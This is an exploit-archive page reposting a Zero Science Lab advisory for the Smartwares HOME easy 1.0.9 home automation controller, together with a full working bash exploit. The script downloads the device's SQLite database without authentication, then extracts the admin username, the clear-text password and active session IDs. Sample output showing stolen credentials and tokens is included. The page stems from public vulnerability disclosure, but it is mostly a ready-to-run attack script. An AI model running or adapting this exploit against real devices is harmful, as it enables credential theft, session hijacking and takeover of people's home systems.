Registersmartwares home easy 1.0.9 database backup information disclosure
▸▸▸ Exploit & Vulnerability >> webapps exploit & hardware vulnerability
Online Vulnerability Scanner Tools
Code...
# Title: Smartwares HOME easy 1.0.9 - Database Backup Information Disclosure # Author: LiquidWorm # Date: 2019-11-05 # Vendor: Smartwares # Product web page: https://www.smartwares.eu # Affected version: <=1.0.9 # Advisory ID: ZSL-2019-5541 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5541.php # CVE: N/A # Summary: Home Easy/Smartwares are a range of products designed to remotely # control your home using wireless technology. Home Easy/Smartwares is very # simple to set up and allows you to operate your electrical equipment like # lighting, appliances, heating etc. # # Desc: The home automation solution is vulnerable to unauthenticated database # backup download and information disclosure vulnerability. This can enable the # attacker to disclose sensitive and clear-text information resulting in authentication # bypass, session hijacking and full system control. #!/bin/bash # # ============================================================================== # root@kali:~/homeeasy# ./he_info.sh http://192.168.1.177:8004 # Target: http://192.168.1.177:8004 # Filename: 192.168.1.177:8004-16072019-db.sqlite # Username: admin # Password: s3cr3tP4ssw0rd # Version: 1.0.9 # Sessions: # ------------------------------------------------------------------ # * Ft5Mkgr5i9ywVrRH4mAECSaNJkTp5oiC0fpbuIgDIFbE83f3hGGKzIyb3krXHBsy # * Gcea4Ald4PlVGkOh23mIohGq2Da6h4mX0A8ibkm7by3QSI8TLmuaubrvGABWvWMJ # * JFU4zpdhuN4RTYgvvAhKQKqnQSvc8MAJ0nMTLYb8F6YzV7WjHe4qYlMH6aSdOlN9 # * VtOqw37a12jPdJH3hJ5E9qrc3I4YY1aU0PmIRkSJecAqMak4TpzTORWIs1zsRInd # * flR4VjFmDBSiaTmXSYQxf4CdtMT3OQxV0pQ1zwfe98niSI9LIYcO3F2nsUpiDVeH # * rCfrAvnfnl6BsLjF9FjBoNgPgvqSptcH0i9yMwN3QSDbwNHwu19ROoAVSROamRRk # ------------------------------------------------------------------ # ============================================================================== if [ "$#" -ne 1 ]; then echo "Usage: $0 http://ip:port" exit 0 fi TARGET=$1 CHECK=$(curl -Is $TARGET/data.dat 2>/dev/null | head -1 | awk -F" " '{print $2}') if [[ "$?" = "7" ]] || [[ $CHECK != "200" ]]; then echo "No juice." exit 1 fi echo "Target: "$TARGET FNAME=${TARGET:7}-$(date +"%d%m%Y") curl -s $TARGET/data.dat -o $FNAME-db.sqlite echo "Filename: $FNAME-db.sqlite" echo "Username: "$(sqlite3 $FNAME-db.sqlite "select usrname from usr") # default: admin echo "Password: "$(sqlite3 $FNAME-db.sqlite "select usrpassword from usr") # default: 111111 echo "Version: "$(sqlite3 $FNAME-db.sqlite "select option_value1 from option LIMIT 1 OFFSET 3") echo -ne "Sessions: \n" printf "%0.s-" {1..66} printf "\n" sqlite3 $FNAME-db.sqlite "select sessionid from sessiontable" | xargs -L1 echo "*" printf "%0.s-" {1..66} ; printf "\n\n"
Smartwares home easy 1.0.9 database backup information disclosure Vulnerability / Exploit Source : Smartwares home easy 1.0.9 database backup information disclosure
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes